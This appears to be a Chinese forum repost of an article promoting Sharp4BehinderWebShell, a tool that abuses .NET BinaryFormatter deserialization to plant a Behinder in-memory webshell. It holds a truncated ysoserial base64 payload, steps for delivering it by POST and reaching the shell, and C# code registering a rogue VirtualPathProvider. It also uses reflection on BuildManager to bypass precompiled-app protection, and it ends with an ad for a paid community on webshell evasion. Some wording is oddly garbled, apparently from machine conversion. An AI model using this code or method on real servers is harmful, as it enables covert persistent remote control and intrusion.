ToB企服应用市场:ToB评测及商务社交产业平台

标题: .NET 一款反序列化打入冰蝎内存马的工具 [打印本页]

作者: 熊熊出没    时间: 2024-8-28 18:52
标题: .NET 一款反序列化打入冰蝎内存马的工具
01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包罗但不限于)进行检测或维护参考,未经授权请勿使用文章中的技术资料对任何计算机体系进行入侵操作。使用此文所提供的信息而造成的直接或间接后果和丧失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02根本介绍

Sharp4BehinderWebShell 是一款使用.NET反序列化毛病向内存中植入冰蝎WebShell的工具。通过这种方式,可以使用冰蝎客户端毗连内存马获取WebShell,而且支持在.NET预编译环境下使用。以下是对该工具的具体介绍,包罗其使用方法和代码表明。


03使用方法

使用ysoserial生成冰蝎内存马的反序列化攻击负载,用于触发毛病部分。以下是一个通过BinaryFormatter触发反序列化毛病的示例负载,由于比力长此处仅展示一部分内容。
  1. AAEAAAD/AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdG.........................
复制代码
接着,将生成的反序列化攻击负载通过POST请求发送到目的服务器,触发.NET反序列化毛病,成功后即植入冰蝎内存马。访问以下URL即可加载WebShell:
  1. http://localhost:51448/fakepath31337/{0}.aspx
复制代码
此处的fakepath31337路径可以自定义,通过修改Poc里的参数即可,此中{0}表示占位符,可以替换成任意字符,好比请求 /fakepath31337/36.aspx


上图中没有出现非常错误,随后,通过冰蝎客户端成功毗连到内存马,执行命令如下图所示


04编码实现

Sharp4BehinderWebShell 主要通过注册自定义的虚拟路径提供步伐(VirtualPathProvider)并联合反序列化攻击负载,实现对目的服务器的控制。首先该类继续自 System.Web.Hosting.VirtualPathProvider,用于注册虚拟路径提供步伐,重写其方法以提供自定义路径和文件内容。
  1. public class SamplePathProvider : System.Web.Hosting.VirtualPathProvider
  2. {
  3.     private string _virtualDir;
  4.     private string _fileContent;
  5.     public SamplePathProvider(string virtualDir, string fileContent)
  6.       : base()
  7.     {
  8.         _virtualDir = "/" + virtualDir.Replace(@"", "/");
  9.         _virtualDir = _virtualDir.Replace("//", "/").TrimEnd('/');
  10.         // 初始化文件内容
  11.         _fileContent = fileContent;
  12.     }
  13.     protected override void Initialize()
  14.     {
  15.         // 初始化操作,可以在这里添加自定义逻辑
  16.     }
  17. }
复制代码
接着,该SampleVirtualFile类继续自 System.Web.Hosting.VirtualFile,用于表示虚拟文件,并提供文件内容,具体代码如下所示。
  1. public class SampleVirtualFile : System.Web.Hosting.VirtualFile
  2. {
  3.     private string _fileContent;
  4.     public bool Exists => true;
  5.     public SampleVirtualFile(string virtualPath, string fileContent)
  6.       : base(virtualPath)
  7.     {
  8.         // 初始化文件内容
  9.         _fileContent = fileContent;
  10.     }
  11.     public override System.IO.Stream Open()
  12.     {
  13.         return new System.IO.MemoryStream(System.Text.Encoding.UTF8.GetBytes(_fileContent));
  14.     }
  15. }
复制代码
同时,工具通过反射修改 System.Web.Compilation.BuildManager 类的私有字段,动态关闭预编译设置。如下所示。
  1. if (System.Web.Compilation.BuildManager.IsPrecompiledApp)
  2. {
  3.     var typeBuildManager = typeof(System.Web.Compilation.BuildManager);
  4.     var field_theBuildManager = typeBuildManager.GetField("_theBuildManager", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
  5.     var field_isPrecompiledAppComputed = typeBuildManager.GetField("_isPrecompiledAppComputed", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);
  6.     var field_isPrecompiledApp = typeBuildManager.GetField("_isPrecompiledApp", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);
  7.     var field_theBuildManager_instance = field_theBuildManager.GetValue(null);
  8.     var field_isPrecompiledAppComputed_oldValue = field_isPrecompiledAppComputed.GetValue(field_theBuildManager_instance);
  9.     var field_isPrecompiledApp_oldValue = field_isPrecompiledApp.GetValue(field_theBuildManager_instance);
  10.     field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, true);
  11.     field_isPrecompiledApp.SetValue(field_theBuildManager_instance, false);
  12.     // 注册自定义的 VirtualPathProvider
  13.     System.Web.Hosting.HostingEnvironment.RegisterVirtualPathProvider(sampleProvider);
  14.     field_isPrecompiledAppComputed.SetValue(field_theBuildManager_instance, field_isPrecompiledAppComputed_oldValue);
  15.     field_isPrecompiledApp.SetValue(field_theBuildManager_instance, field_isPrecompiledApp_oldValue);
  16. }
复制代码
这里,通过 Compilation.BuildManager.IsPrecompiledApp 检查应用是否为预编译,最后,RegisterVirtualPathProvider(sampleProvider) 注册自定义的虚拟路径提供步伐。
Sharp4BehinderWebShell 提供了一种使用.NET反序列化毛病向内存中植入冰蝎WebShell的本领,可以绕过.NET预编译环境的限制,实现对目的体系的控制。
05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,而且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。



20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速发展!此中主题包罗.NET Tricks、毛病分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。


我们倾力打造专刊、视频等配套学习资源,循规蹈矩的方式引导加深安全攻防技术进步以及岗位内推等等服务。




免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4